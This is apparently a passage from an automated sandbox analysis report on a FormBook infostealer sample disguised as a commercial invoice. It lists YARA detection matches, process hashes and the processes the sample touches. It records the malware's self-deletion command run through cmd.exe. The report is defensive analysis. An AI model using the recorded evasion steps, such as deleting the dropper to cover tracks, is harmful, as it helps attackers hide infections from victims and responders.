                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.734155296.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:10:20:39
                                                Start date:14/01/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6fee60000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.724210949.000000000EA3D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:10:20:59
                                                Start date:14/01/2022
                                                Path:C:\Windows\SysWOW64\colorcpl.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                Imagebase:0x1330000
                                                File size:86528 bytes
                                                MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.943178813.0000000000840000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.943350067.0000000000DF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Start time:10:21:03
                                                Start date:14/01/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Users\user\Desktop\commercial invoice_010202201.exe"
                                                Imagebase:0x11d0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:10:21:03
                                                Start date:14/01/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff724c50000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Reset < >